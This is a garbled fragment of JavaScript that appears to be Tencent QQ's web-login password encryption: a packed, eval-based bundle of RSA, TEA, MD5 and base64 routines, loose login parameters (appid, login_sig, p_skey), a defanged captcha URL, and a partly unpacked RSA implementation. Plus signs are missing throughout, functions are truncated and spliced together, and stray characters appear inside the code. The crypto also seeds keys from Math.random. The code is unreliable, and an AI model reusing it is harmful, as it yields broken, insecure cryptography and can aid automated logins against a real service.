=M.1z(0,O,C,N,0,E))<O)19(M.1L(N,P),C.1m(P,C);C[Q]<--O;)C.1m(P,C)}1d!=A&&(C.2b(E,A),J!=r&&B.1x.1m(A,A));C.t=E;C.1q();0<G&&C.2n(G,C);0>J&&B.1x.1m(C,C)}}}};B.1b.2V=X(){1a(1>W.t)Z 0;Y r=W[0];1a(0==(r&1))Z 0;Y z=r&3,z=z*(2-(r&15)*z)&15,z=z*(2-(r&1f)*z)&1f,z=z*(2-((r&1G)*z&1G))&1G,z=z*(2-r*z%W.1o)%W.1o;Z 0<z?W.1o-z:-z};B.1b.2G=X(){Z 0==(0<W.t?W[0]&1:W.s)};B.1b.2E=X(r,A){1a(1r<r||1>r)Z B.1U;Y C=z(),E=z(),F=A.2e(W),G=D(r)-1;19(F.1I(C);0<=--G;)1a(A.1Y(C,E),0<(r&1<<G))A.1V(E,F,C);1h Y J=C,C=E,E=J;Z A.2m(C)};B.1b.1F=X(r){1a(0>W.s)Z"-" W.1Z().1F(r);1a(16==r)r=4;1h 1a(8==r)r=3;1h 1a(2==r)r=1;1h 1a(32==r)r=5;1h 1a(4==r)r=2;1h Z W.3o(r);Y z=(1<<r)-1,A,B=!1,C="",D=W.t,E=W.1e-D*W.1e%r;1a(0<D--)19(E<W.1e&&0<(A=W[D]>>E)&&(B=!0,C="2A".1l(A));0<=D;)E<r?(A=(W[D]&(1<<E)-1)<<r-E,A|=W[--D]>>(E =W.1e-r)):(A=W[D]>>(E-=r)&z,0>=E&&(E =W.1e,--D)),0<A&&(B=!0),B&&(C ="2A".1l(A));Z B?C:"0"};B.1b.1Z=X(){Y r=z();B.1x.1m(W,r);Z r};B.1b.1w=X(){Z 0>W.s?W.1Z():W};B.1b.1H=X(r){Y z=W.s-r.s;1a(0!=z)Z z;Y A=W.t,z=A-r.t;1a(0!=z)Z z;19(;0<=--A;)1a(0!=(z=W[A]-r[A]))Z z;Z 0};B.1b.2N=X(){Z 0>=W.t?0:W.1e*(W.t-1) D(W[W.t-1]^W.s&W.1s)};B.1b.2J=X(r){Y A=z();W.1w().1Q(r,1d,A);0>W.s&&0<A.1H(B.1x)&&r.1m(A,A);Z A};B.1b.2Q=X(r,z){Y A;A=1B>r||z.2G()?1u C(z):1u E(z);Z W.2E(r,A)};B.1x=A(0);B.1U=A(1);Y T,L,G;1a(1d==L){L=[];19(G=0;G<U;)H=1p.1P(3t*1p.2z()),L[G  ]=H>>>8,L[G  ]=H&1f;G=0;F()}O.1b.2M=X(r){Y z;19(z=0;z<r.1c;  z){Y A=z,B;1a(1d==T){F();T=1u N;T.2y(L);19(G=0;G<L.1c;  G)L[G]=0;G=0}B=T.2x();r[A]=B}};N.1b.2y=X(r){Y z,A,B;19(z=0;1B>z;  z)W.S[z]=z;19(z=A=0;1B>z;  z)A=A W.S[z] r[z%r.1c]&1f,B=W.S[z],W.S[z]=W.S[A],W.S[A]=B;W.j=W.i=0};N.1b.2x=X(){Y r;W.i=W.i 1&1f;W.j=W.j W.S[W.i]&1f;r=W.S[W.i];W.S[W.i]=W.S[W.j];W.S[W.j]=r;Z W.S[r W.S[W.i]&1f]};Y U=1B;Z{2r:X(z,A,B){A="41";B="3";Y C=1u r;C.2P(A,B);Z C.26(z)}}}(),s="",a=0,g=[],x=[],y=0,u=0,m=[],t=[],n=!0;X e(){Z 1p.35(1r*1p.2z())}X j(r,B,z){1a(!z||4<z)z=4;19(Y A=0,D=B;D<B z;D  )A<<=8,A|=r[D];Z(A&1r)>>>0}X b(r,B,z){r[B 3]=z>>0&1f;r[B 2]=z>>8&1f;r[B 1]=z>>16&1f;r[B 0]=z>>24&1f}X w(r){1a(!r)Z"";19(Y B="",z=0;z<r.1c;z  ){Y A=59(r[z]).1F(16);1==A.1c&&(A="0" A);B =A}Z B}X v(r){19(Y B="",z=0;z<r.1c;z =2)B =2h.2i(1T(r.2j(z,2),16));Z B}X c(r){1a(!r)Z"";19(Y B=[],z=0;z<r.1c;z  )B[z]=r.1C(z);Z w(B)}X h(r){g=1t(8);x=1t(8);y=u=0;n=!0;a=0;Y B=r.1c,z=0;a=(B 10)%8;0!=a&&(a=8-a);m=1t(B a 10);g[0]=(e()&3m|a)&1f;19(z=1;z<=a;z  )g[z]=e()&1f;a  ;19(z=0;8>z;z  )x[z]=0;19(z=1;2>=z;)8>a&&(g[a  ]=e()&1f,z  ),8==a&&p();19(z=0;0<B;)8>a&&(g[a  ]=r[z  ],B--),8==a&&p();19(z=1;7>=z;)8>a&&(g[a  ]=0,z  ),8==a&&p();Z m}X q(r){Y B=0,z=1t(8),B=r.1c;t=r;1a(0!=B%8||16>B)Z 1d;x=l(r);a=x[0]&7;B=B-a-10;1a(0>B)Z 1d;19(Y A=0;A<z.1c;A  )z[A]=0;m=1t(B);u=0;y=8;a  ;19(A=1;2>=A;)1a(8>a&&(a  ,A  ),8==a&&(z=r,!f()))Z 1d;19(A=0;0!=B;)1a(8>a&&(m[A]=(z[u a]^x[a])&1f,A  ,B--,a  ),8==a&&(z=r,u=y-8,!f()))Z 1d;19(A=1;8>A;A  ){1a(8>a){1a(0!=(z[u a]^x[a]))Z 1d;a  }1a(8==a&&(z=r,u=y,!f()))Z 1d}Z m}X p(){19(Y r=0;8>r;r  )g[r]=n?g[r]^x[r]:g[r]^m[u r];19(Y B=k(g),r=0;8>r;r  )m[y r]=B[r]^x[r],x[r]=g[r];u=y;y =8;a=0;n=!1}X k(r){Y B=16,z=j(r,0,4);r=j(r,4,4);19(Y A=j(s,0,4),D=j(s,4,4),C=j(s,8,4),E=j(s,12,4),F=0;0<B--;)F =2o,F=(F&1r)>>>0,z =(r<<4) A^r F^(r>>>5) D,z=(z&1r)>>>0,r =(z<<4) C^z F^(z>>>5) E,r=(r&1r)>>>0;B=1t(8);b(B,0,z);b(B,4,r);Z B}X l(r){Y B=16,z=j(r,0,4);r=j(r,4,4);19(Y A=j(s,0,4),D=j(s,4,4),C=j(s,8,4),E=j(s,12,4),F=3y;0<B--;)r-=(z<<4) C^z F^(z>>>5) E,r=(r&1r)>>>0,z-=(r<<4) A^r F^(r>>>5) D,z=(z&1r)>>>0,F-=2o,F=(F&1r)>>>0;B=1t(8);b(B,0,z);b(B,4,r);Z B}X f(){19(Y r=0;8>r;r  )x[r]^=t[y r];x=l(x);y =8;a=0;Z!0}X o(r,B){Y z=[];1a(B)19(Y A=0;A<r.1c;A  )z[A]=r.1C(A)&1f;1h 19(Y D=0,A=0;A<r.1c;A =2)z[D  ]=1T(r.2j(A,2),16);Z z}Y 1D={26:X(r,B){Y z=o(r,B),z=h(z);Z w(z)},2p:X(r,B){19(Y z=o(r,B),z=h(z),A="",D=0;D<z.1c;D  )A =2h.2i(z[D]);Z d.2q(A)},3X:X(r){r=o(r,!1);r=q(r);Z w(r)},2g:X(r,B){s=o(r,B)},4g:v,28:c,4y:w,4C:o},d={2s:"=",2t:"4S /",2u:X(r,B){Y z=r.1C(B);1a(1f<z)2v"53: 54 34 5";Z z},2q:X(r){1a(1!=2w.1c)2v"37: 38 39 2w";Y B=d.2s,z=d.2t,A=d.2u,D,C,E=[];r="" r;Y F=r.1c-r.1c%3;1a(0==r.1c)Z r;19(D=0;D<F;D =3)C=A(r,D)<<16|A(r,D 1)<<8|A(r,D 2),E.1y(z.1l(C>>18)),E.1y(z.1l(C>>12&1J)),E.1y(z.1l(C>>6&1J)),E.1y(z.1l(C&1J));3e(r.1c-F){2B 1:C=A(r,D)<<16;E.1y(z.1l(C>>18) z.1l(C>>12&1J) B B);3g;2B 2:C=A(r,D)<<16|A(r,D 1)<<8,E.1y(z.1l(C>>18) z.1l(C>>12&1J) z.1l(C>>6&1J) B)}Z E.2C("")}},2D=1,3j="",1n=8,2F=32;X 1W(r){Z 2H(r)}X 2H(r){Z 2l(1E(1K(r),r.1c*1n))}X 3q(r){Z 2d(1E(1K(r),r.1c*1n))}X 3s(r,B){Z 2l(1R(r,B))}X 3u(r,B){Z 3v(1R(r,B))}X 3w(r,B){Z 2d(1R(r,B))}X 1E(r,B){r[B>>5]|=2I<<B2;r[(B 3x>>>9<<4) 14]=B;19(Y z=3z,A=-3A,D=-3B,C=3C,E=0;E<r.1c;E =16)Y F=z,O=A,N=D,H=C,z=1j(z,A,D,C,r[E 0],7,-3E),C=1j(C,z,A,D,r[E 1],12,-3F),D=1j(D,C,z,A,r[E 2],17,3H),A=1j(A,D,C,z,r[E 3],22,-3J),z=1j(z,A,D,C,r[E 4],7,-3K),C=1j(C,z,A,D,r[E 5],12,3L),D=1j(D,C,z,A,r[E 6],17,-3M),A=1j(A,D,C,z,r[E 7],22,-3N),z=1j(z,A,D,C,r[E 8],7,3O),C=1j(C,z,A,D,r[E 9],12,-3P),D=1j(D,C,z,A,r[E 10],17,-3Q),A=1j(A,D,C,z,r[E 11],22,-3R),z=1j(z,A,D,C,r[E 12],7,3S),C=1j(C,z,A,D,r[E 13],12,-3U),D=1j(D,C,z,A,r[E 14],17,-3V),A=1j(A,D,C,z,r[E 15],22,3W),z=1g(z,A,D,C,r[E 1],5,-3Y),C=1g(C,z,A,D,r[E 6],9,-3Z),D=1g(D,C,z,A,r[E 11],14,40),A=1g(A,D,C,z,r[E 0],20,-42),z=1g(z,A,D,C,r[E 5],5,-43),C=1g(C,z,A,D,r[E 10],9,44),D=1g(D,C,z,A,r[E 15],14,-45),A=1g(A,D,C,z,r[E 4],20,-46),z=1g(z,A,D,C,r[E 9],5,47),C=1g(C,z,A,D,r[E 14],9,-49),D=1g(D,C,z,A,r[E 3],14,-4a),A=1g(A,D,C,z,r[E 8],20,4b),z=1g(z,A,D,C,r[E 13],5,-4c),C=1g(C,z,A,D,r[E 2],9,-4d),D=1g(D,C,z,A,r[E 7],14,4e),A=1g(A,D,C,z,r[E 12],20,-4f),z=1i(z,A,D,C,r[E 5],4,-4h),C=1i(C,z,A,D,r[E 8],11,-4i),D=1i(D,C,z,A,r[E 11],16,4j),A=1i(A,D,C,z,r[E 14],23,-4l),z=1i(z,A,D,C,r[E 1],4,-4m),C=1i(C,z,A,D,r[E 4],11,4n),D=1i(D,C,z,A,r[E 7],16,-4o),A=1i(A,D,C,z,r[E 10],23,-4p),z=1i(z,A,D,C,r[E 13],4,4q),C=1i(C,z,A,D,r[E 0],11,-4r),D=1i(D,C,z,A,r[E 3],16,-4s),A=1i(A,D,C,z,r[E 6],23,4t),z=1i(z,A,D,C,r[E 9],4,-4u),C=1i(C,z,A,D,r[E 12],11,-4v),D=1i(D,C,z,A,r[E 15],16,4w),A=1i(A,D,C,z,r[E 2],23,-4x),z=1k(z,A,D,C,r[E 0],6,-4z),C=1k(C,z,A,D,r[E 7],10,4A),D=1k(D,C,z,A,r[E 14],15,-4B),A=1k(A,D,C,z,r[E 5],21,-4D),z=1k(z,A,D,C,r[E 12],6,4E),C=1k(C,z,A,D,r[E 3],10,-4F),D=1k(D,C,z,A,r[E 10],15,-4G),A=1k(A,D,C,z,r[E 1],21,-4H),z=1k(z,A,D,C,r[E 8],6,4I),C=1k(C,z,A,D,r[E 15],10,-4J),D=1k(D,C,z,A,r[E 6],15,-4K),A=1k(A,D,C,z,r[E 13],21,4L),z=1k(z,A,D,C,r[E 4],6,-4M),C=1k(C,z,A,D,r[E 11],10,-4N),D=1k(D,C,z,A,r[E 2],15,4O),A=1k(A,D,C,z,r[E 9],21,-4P),z=1v(z,F),A=1v(A,O),D=1v(D,N),C=1v(C,H);Z 16==2F?[A,D]:[z,A,D,C]}X 1M(r,B,z,A,D,C){Z 1v(2X(1v(1v(B,r),1v(A,C)),D),z)}X 1j(r,B,z,A,D,C,E){Z 1M(B&z|~B&A,r,B,D,C,E)}X 1g(r,B,z,A,D,C,E){Z 1M(B&A|z&~A,r,B,D,C,E)}X 1i(r,B,z,A,D,C,E){Z 1M(B^z^A,r,B,D,C,E)}X 1k(r,B,z,A,D,C,E){Z 1M(z^(B|~A),r,B,D,C,E)}X 1R(r,B){Y z=1K(r);16<z.1c&&(z=1E(z,r.1c*1n));19(Y A=1t(16),D=1t(16),C=0;16>C;C  )A[C]=z[C]^4T,D[C]=z[C]^4U;z=1E(A.2Y(1K(B)),4W B.1c*1n);Z 1E(D.2Y(z),4X)}X 1v(r,B){Y z=(r&1G) (B&1G);Z(r>>16) (B>>16) (z>>16)<<16|z&1G}X 2X(r,B){Z r<<B|r>>>32-B}X 1K(r){19(Y B=[],z=(1<<1n)-1,A=0;A<r.1c*1n;A =1n)B[A>>5]|=(r.1C(A/1n)&z)<<A2;Z B}X 2d(r){19(Y B="",z=(1<<1n)-1,A=0;A<32*r.1c;A =1n)B =2h.2i(r[A>>5]>>>A2&z);Z B}X 2l(r){19(Y B=2D?"4Y":"4Z",z="",A=0;A<4*r.1c;A  )z =B.1l(r[A>>2]>>A%4*8 4&15) B.1l(r[A>>2]>>A%4*8&15);Z z}X 2Z(r){19(Y B=[],z=0;z<r.1c;z =2)B.1y("\\\\x" r.2j(z,2));B=B.2C("");51("Y 31 = \'" B "\'");Z 31}X 33(r,B,z,A){z=z||"";r=r||"";r=A?r:1W(r);A=2Z(r);r=1W(A B);A=1O.2r(A);Y D=(A.1c/2).1F(16),C=1D.28(z.55());19(z="56" z.1c.1F(16);4>D.1c;)D="0" D;1D.2g(r);B=1D.2p(D A 1D.28(B) z C);1D.2g("");Z B.57(/[\\/\\ =]/g,X(r){Z{"/":"-"," ":"*","=":"58"}[r]})}X 4Q(r,B,z){Z 33(r,B,z,!1)};',62,320,'||||||||||||||||||||||||||||||||||||||||||||||||||||||||||this|function|var|return||||||||||for|if|prototype|length|null|DB|255|md5_gg|else|md5_hh|md5_ff|md5_ii|charAt|subTo|chrsz|DV|Math|clamp|4294967295|DM|Array|new|safe_add|abs|ZERO|push|am|reduce|256|charCodeAt|TEA|core_md5|toString|65535|compareTo|copyTo|63|str2binl|dlShiftTo|md5_cmn|32767|RSA|floor|divRemTo|core_hmac_md5|fromString|parseInt|ONE|mulTo|md5|multiplyTo|sqrTo|negate||||||squareTo|encrypt|F1|strToBytes|F2|mp|drShiftTo|fromInt|binl2str|convert|mpl|initkey|String|fromCharCode|substr|lShiftTo|binl2hex|revert|rShiftTo|2654435769|enAsBase64|encode|rsa_encrypt|PADCHAR|ALPHA|getbyte|throw|arguments|next|init|random|0123456789abcdefghijklmnopqrstuvwxyz|case|join|hexcase|exp|mode|isEven|hex_md5|128|mod|FV|1073741823|nextBytes|bitLength|uv_alert|setPublic|modPowInt|doPublic|mt2|um|mph|invDigit|typeof|bit_rol|concat|hexchar2bin||temp||getEncryption|Exception|round||SyntaxError|Not|enough|Message|min|too|pow|switch|long|break|dmq1|fromNumber|b64pad|Date|Invalid|248|97|toRadix|public|str_md5|key|hex_hmac_md5|65536|b64_hmac_md5|binl2b64|str_hmac_md5|64|3816266640|1732584193|271733879|1732584194|271733878|65|680876936|389564586|getTime|606105819|fromRadix|1044525330|176418897|1200080426|1473231341|45705983|1770035416|1958414417|42063|1990404162|1804603682|string|40341101|1502002290|1236535329|decrypt|165796510|1069501632|643717713|F20CE00BAE5361F8FA3AE9CEFA495362FF7DA1BA628F64A347F0A8C012BF0B254A30CD92ABFFE7A6EE0DC424CB6166F8819EFA5BCCB20EDFB4AD02E412CCF579B1CA711D55B8B0B3AEB60153D5E0693A2A86F3167D7847A0CB8B00004716A9095D9BADC977CBB804DBDCBA6029A9710869A453F27DFDDF83C016D928B3CBF4C7|373897302|701558691|38016083|660478335|405537848|568446438||1019803690|187363961|1163531501|1444681467|51403784|1735328473|1926607734|bytesToStr|378558|2022574463|1839030562|dmp1|35309556|1530992060|1272893353|155497632|1094730640|681279174|358537222|722521979|76029189|640364487|421815835|530742520|995338651|bytesInStr|198630844|1126891415|1416354905|dataFromStr|57434055|1700485571|1894986606|1051523|2054922799|1873313359|30611744|1560198380|1309151649|145523070|1120210379|718787259|343485551|Hs|max|ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789|909522486|1549556828|coeff|512|640|0123456789ABCDEF|0123456789abcdef|number|eval||INVALID_CHARACTER_ERR|DOM|toUpperCase|000|replace|_|Number'.split('|'),0,{}))
p_skey=;
airkey=;
&appid=549000912&js_ver=10135&js_type=1&login_sig=&u1=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone&r=0.
hXXp://captcha.qq.com/getimgbysig?clientype=2&uin=
var window=window||{};$=window.$||{};$pt=window.$pt||{};$pt.RSA=function(){function g(z,t){return new ar(z,t)}
function ah(aA,aB){var t='';var z=0;while(z aB<aA.length){t =aA.substring(z,z aB) '\n';z =aB}
return t aA.substring(z,aA.length)}
function r(t){if(t<16){return'0' t.toString(16)}else{return t.toString(16)}}
function af(aB,aE){if(aE<aB.length 11){uv_alert('Message too long for RSA');return null}
var aD=new Array();var aA=aB.length-1;while(aA>=0&&aE>0){var aC=aB.charCodeAt(aA--);aD[--aE]=aC}
aD[--aE]=0;var z=new ad();var t=new Array();while(aE>2){t[0]=0;while(t[0]==0){z.nextBytes(t)}
function L(){this.n=null;this.e=0;this.d=null;this.p=null;this.q=null;this.dmp1=null;this.dmq1=null;this.coeff=null}
function o(z,t){if(z!=null&&t!=null&&z.length>0&&t.length>0){this.n=g(z,16);this.e=parseInt(t,16)}else{uv_alert('Invalid RSA public key')}}
function W(t){return t.modPowInt(this.e,this.n)}
function p(aA){var t=af(aA,(this.n.bitLength() 7)>>3);if(t==null){return null}
var aB=this.doPublic(t);if(aB==null){return null}
var z=aB.toString(16);if((z.length&1)==0){return z}else{return'0' z}}
L.prototype.doPublic=W;L.prototype.setPublic=o;L.prototype.encrypt=p;var aw;var ai=244837814094590;var Z=((ai&16777215)==15715070);function ar(z,t,aA){if(z!=null){if('number'==typeof z){this.fromNumber(z,t,aA)}else{if(t==null&&'string'!=typeof z){this.fromString(z,256)}else{this.fromString(z,t)}}}}
function b(aC,t,z,aB,aE,aD){while(--aD>=0){var aA=t*this[aC  ] z[aB] aE;aE=Math.floor(aA/67108864);z[aB  ]=aA&67108863}
var navigator=navigator||{};if(Z&&(navigator.appName=='Microsoft Internet Explorer')){ar.prototype.am=ay;aw=30}else{if(Z&&(navigator.appName!='Netscape')){ar.prototype.am=b;aw=26}else{ar.prototype.am=ax;aw=28}}
ar.prototype.DB=aw;ar.prototype.DM=((1<<aw)-1);ar.prototype.DV=(1<<aw);var aa=52;ar.prototype.FV=Math.pow(2,aa);ar.prototype.F1=aa-aw;ar.prototype.F2=2*aw-aa;var ae='0123456789abcdefghijklmnopqrstuvwxyz';var ag=new Array();var ap,v;ap='0'.charCodeAt(0);for(v=0;v<=9;  v){ag[ap  ]=v}
ap='a'.charCodeAt(0);for(v=10;v<36;  v){ag[ap  ]=v}
ap='A'.charCodeAt(0);for(v=10;v<36;  v){ag[ap  ]=v}
function az(t){return ae.charAt(t)}
function A(z,t){var aA=ag[z.charCodeAt(t)];return(aA==null)?-1:aA}
function c(t){var z=h();z.fromInt(t);return z}
function w(aE,z){var aB;if(z==16){aB=4}else{if(z==8){aB=3}else{if(z==256){aB=8}else{if(z==2){aB=1}else{if(z==32){aB=5}else{if(z==4){aB=2}else{this.fromRadix(aE,z);return}}}}}}
this.t=0;this.s=0;var aD=aE.length,aA=false,aC=0;while(--aD>=0){var t=(aB==8)?aE[aD]&255:A(aE,aD);if(t<0){if(aE.charAt(aD)=='-'){aA=true}
aA=false;if(aC==0){this[this.t  ]=t}else{if(aC aB>this.DB){this[this.t-1]|=(t&((1<<(this.DB-aC))-1))<<aC;this[this.t  ]=(t>>(this.DB-aC))}else{this[this.t-1]|=t<<aC}}
aC =aB;if(aC>=this.DB){aC-=this.DB}}
if(aB==8&&(aE[0]&128)!=0){this.s=-1;if(aC>0){this[this.t-1]|=((1<<(this.DB-aC))-1)<<aC}}
this.clamp();if(aA){ar.ZERO.subTo(this,this)}}
function O(){var t=this.s&this.DM;while(this.t>0&&this[this.t-1]==t){--this.t}}
function q(z){if(this.s<0){return'-' this.negate().toString(z)}
var aA;if(z==16){aA=4}else{if(z==8){aA=3}else{if(z==2){aA=1}else{if(z==32){aA=5}else{if(z==4){aA=2}else{return this.toRadix(z)}}}}}
var aC=(1<<aA)-1,aF,t=false,aD='',aB=this.t;var aE=this.DB-(aB*this.DB)ª;if(aB-->0){if(aE<this.DB&&(aF=this[aB]>>aE)>0){t=true;aD=az(aF)}
while(aB>=0){if(aE<aA){aF=(this[aB]&((1<<aE)-1))<<(aA-aE);aF|=this[--aB]>>(aE =this.DB-aA)}else{aF=(this[aB]>>(aE-=aA))&aC;if(aE<=0){aE =this.DB;--aB}}
function R(){var t=h();ar.ZERO.subTo(this,t);return t}
function al(){return(this.s<0)?this.negate():this}
return this.DB*(this.t-1) j(this[this.t-1]^(this.s&this.DM))}
z.t=Math.max(this.t-aA,0);z.s=this.s}
function s(aF,aB){var z=aF%this.DB;var t=this.DB-z;var aD=(1<<t)-1;var aC=Math.floor(aF/this.DB),aE=(this.s<<z)&this.DM,aA;for(aA=this.t-1;aA>=0;--aA){aB[aA aC 1]=(this[aA]>>t)|aE;aE=(this[aA]&aD)<<z}
aB[aC]=aE;aB.t=this.t aC 1;aB.s=this.s;aB.clamp()}
function l(aE,aB){aB.s=this.s;var aC=Math.floor(aE/this.DB);if(aC>=this.t){aB.t=0;return}
var z=aE%this.DB;var t=this.DB-z;var aD=(1<<z)-1;aB[0]=this[aC]>>z;for(var aA=aC 1;aA<this.t;  aA){aB[aA-aC-1]|=(this[aA]&aD)<<t;aB[aA-aC]=this[aA]>>z}
aB.t=this.t-aC;aB.clamp()}
function ab(z,aB){var aA=0,aC=0,t=Math.min(z.t,this.t);while(aA<t){aC =this[aA]-z[aA];aB[aA  ]=aC&this.DM;aC>>=this.DB}
if(z.t<this.t){aC-=z.s;while(aA<this.t){aC =this[aA];aB[aA  ]=aC&this.DM;aC>>=this.DB}
aC =this.s}else{aC =this.s;while(aA<z.t){aC-=z[aA];aB[aA  ]=aC&this.DM;aC>>=this.DB}
aB.s=(aC<0)?-1:0;if(aC<-1){aB[aA  ]=this.DV aC}else{if(aC>0){aB[aA  ]=aC}}
aB.t=aA;aB.clamp()}
function D(z,aB){var t=this.abs(),aC=z.abs();var aA=t.t;aB.t=aA aC.t;while(--aA>=0){aB[aA]=0}
for(aA=0;aA<aC.t;  aA){aB[aA t.t]=t.am(0,aC[aA],aB,aA,0,t.t)}
aB.s=0;aB.clamp();if(this.s!=z.s){ar.ZERO.subTo(aB,aB)}}
function Q(aA){var t=this.abs();var z=aA.t=2*t.t;while(--z>=0){aA[z]=0}
for(z=0;z<t.t-1;  z){var aB=t.am(z,t[z],aA,2*z,0,1);if((aA[z t.t] =t.am(z 1,2*t[z],aA,2*z 1,aB,t.t-z-1))>=t.DV){aA[z t.t]-=t.DV;aA[z t.t 1]=1}}
if(aA.t>0){aA[aA.t-1] =t.am(z,t[z],aA,2*z,0,1)}
aA.s=0;aA.clamp()}
function E(aI,aF,aE){var aO=aI.abs();if(aO.t<=0){return}
var aG=this.abs();if(aG.t<aO.t){if(aF!=null){aF.fromInt(0)}
if(aE!=null){this.copyTo(aE)}
var aC=h(),z=this.s,aH=aI.s;var aN=this.DB-j(aO[aO.t-1]);if(aN>0){aO.lShiftTo(aN,aC);aG.lShiftTo(aN,aE)}else{aO.copyTo(aC);aG.copyTo(aE)}
var aJ=aA*(1<<this.F1) ((aK>1)?aC[aK-2]>>this.F2:0);var aR=this.FV/aJ,aQ=(1<<this.F1)/aJ,aP=1<<this.F2;var aM=aE.t,aL=aM-aK,aD=(aF==null)?h():aF;aC.dlShiftTo(aL,aD);if(aE.compareTo(aD)>=0){aE[aE.t  ]=1;aE.subTo(aD,aE)}
ar.ONE.dlShiftTo(aK,aD);aD.subTo(aC,aC);while(aC.t<aK){aC[aC.t  ]=0}
while(--aL>=0){var aB=(aE[--aM]==aA)?this.DM:Math.floor(aE[aM]*aR (aE[aM-1] aP)*aQ);if((aE[aM] =aC.am(0,aB,aE,aL,0,aK))<aB){aC.dlShiftTo(aL,aD);aE.subTo(aD,aE);while(aE[aM]<--aB){aE.subTo(aD,aE)}}}
if(aF!=null){aE.drShiftTo(aK,aF);if(z!=aH){ar.ZERO.subTo(aF,aF)}}
aE.t=aK;aE.clamp();if(aN>0){aE.rShiftTo(aN,aE)}
if(z<0){ar.ZERO.subTo(aE,aE)}}
function N(t){var z=h();this.abs().divRemTo(t,null,z);if(this.s<0&&z.compareTo(ar.ZERO)>0){t.subTo(z,z)}
function V(t){if(t.s<0||t.compareTo(this.m)>=0){return t.mod(this.m)}else{return t}}
function J(t){t.divRemTo(this.m,null,t)}
function H(t,aA,z){t.multiplyTo(aA,z);this.reduce(z)}
function au(t,z){t.squareTo(z);this.reduce(z)}
K.prototype.convert=V;K.prototype.revert=ak;K.prototype.reduce=J;K.prototype.mulTo=H;K.prototype.sqrTo=au;function B(){if(this.t<1){return 0}
var z=t&3;z=(z*(2-(t&15)*z))&15;z=(z*(2-(t&255)*z))&255;z=(z*(2-(((t&65535)*z)&65535)))&65535;z=(z*(2-t*z%this.DV))%this.DV;return(z>0)?this.DV-z:-z}
function f(t){this.m=t;this.mp=t.invDigit();this.mpl=this.mp&32767;this.mph=this.mp>>15;this.um=(1<<(t.DB-15))-1;this.mt2=2*t.t}
function aj(t){var z=h();t.abs().dlShiftTo(this.m.t,z);z.divRemTo(this.m,null,z);if(t.s<0&&z.compareTo(ar.ZERO)>0){this.m.subTo(z,z)}
function at(t){var z=h();t.copyTo(z);this.reduce(z);return z}
function P(t){while(t.t<=this.mt2){t[t.t  ]=0}
for(var aA=0;aA<this.m.t;  aA){var z=t[aA]&32767;var aB=(z*this.mpl (((z*this.mph (t[aA]>>15)*this.mpl)&this.um)<<15))&t.DM;z=aA this.m.t;t[z] =this.m.am(0,aB,t,aA,0,this.m.t);while(t[z]>=t.DV){t[z]-=t.DV;t[  z]  }}
t.clamp();t.drShiftTo(this.m.t,t);if(t.compareTo(this.m)>=0){t.subTo(this.m,t)}}
function am(t,z){t.squareTo(z);this.reduce(z)}
function y(t,aA,z){t.multiplyTo(aA,z);this.reduce(z)}
f.prototype.convert=aj;f.prototype.revert=at;f.prototype.reduce=P;f.prototype.mulTo=y;f.prototype.sqrTo=am;function i(){return((this.t>0)?(this[0]&1):this.s)==0}
function x(aF,aG){if(aF>4294967295||aF<1){return ar.ONE}
var aE=h(),aA=h(),aD=aG.convert(this),aC=j(aF)-1;aD.copyTo(aE);while(--aC>=0){aG.sqrTo(aE,aA);if((aF&(1<<aC))>0){aG.mulTo(aA,aD,aE)}else{var aB=aE;aE=aA;aA=aB}}
return aG.revert(aE)}
function an(aA,t){var aB;if(aA<256||t.isEven()){aB=new K(t)}else{aB=new f(t)}
return this.exp(aA,aB)}
ar.prototype.copyTo=Y;ar.prototype.fromInt=n;ar.prototype.fromString=w;ar.prototype.clamp=O;ar.prototype.dlShiftTo=aq;ar.prototype.drShiftTo=X;ar.prototype.lShiftTo=s;ar.prototype.rShiftTo=l;ar.prototype.subTo=ab;ar.prototype.multiplyTo=D;ar.prototype.squareTo=Q;ar.prototype.divRemTo=E;ar.prototype.invDigit=B;ar.prototype.isEven=i;ar.prototype.exp=x;ar.prototype.toString=q;ar.prototype.negate=R;ar.prototype.abs=al;ar.prototype.compareTo=G;ar.prototype.bitLength=u;ar.prototype.mod=N;ar.prototype.modPowInt=an;ar.ZERO=c(0);ar.ONE=c(1);var m;var U;var ac;function d(t){U[ac  ]^=t&255;U[ac  ]^=(t>>8)&255;U[ac  ]^=(t>>16)&255;U[ac  ]^=(t>>24)&255;if(ac>=M){ac-=M}}
function T(){d(new Date().getTime())}
if(U==null){U=new Array();ac=0;var I;if(navigator.appName=='Netscape'&&navigator.appVersion<'5'&&window.crypto&&window.crypto.random){var F=window.crypto.random(32);for(I=0;I<F.length;  I){U[ac  ]=F.charCodeAt(I)&255}}
while(ac<M){I=Math.floor(65536*Math.random());U[ac  ]=I>>>8;U[ac  ]=I&255}
function C(){if(m==null){T();m=ao();m.init(U);for(ac=0;ac<U.length;  ac){U[ac]=0}
return m.next()}
function av(z){var t;for(t=0;t<z.length;  t){z[t]=C()}}
ad.prototype.nextBytes=av;function k(){this.i=0;this.j=0;this.S=new Array()}
z=0;for(aB=0;aB<256;  aB){z=(z this.S[aB] aC[aB¬.length])&255;aA=this.S[aB];this.S[aB]=this.S[z];this.S[z]=aA}
k.prototype.init=e;k.prototype.next=a;function ao(){return new k()}
var M=256;function S(aB,aA,z){aA='F20CE00BAE5361F8FA3AE9CEFA495362FF7DA1BA628F64A347F0A8C012BF0B254A30CD92ABFFE7A6EE0DC424CB6166F8819EFA5BCCB20EDFB4AD02E412CCF579B1CA711D55B8B0B3AEB60153D5E0693A2A86F3167D7847A0CB8B00004716A9095D9BADC977CBB804DBDCBA6029A9710869A453F27DFDDF83C016D928B3CBF4C7';z='3';var t=new L();t.setPublic(aA,z);return t.encrypt(aB)}
return{rsa_encrypt:S}}();var r=window||{};(function(r){var s='',a=0,g=[],x=[],y=0,u=0,m=[],t=[],n=true;function e(){return Math.round(Math.random()*4294967295)}
var z='';for(var A=0;A<C.length;A  ){var B=Number(C[A]).toString(16);if(B.length==1){B='0' B}
function v(A){var B='';for(var z=0;z<A.length;z =2){B =String.fromCharCode(parseInt(A.substr(z,2),16))}
var B=[];for(var A=0;A<C.length;A  ){B[A]=C.charCodeAt(A)}
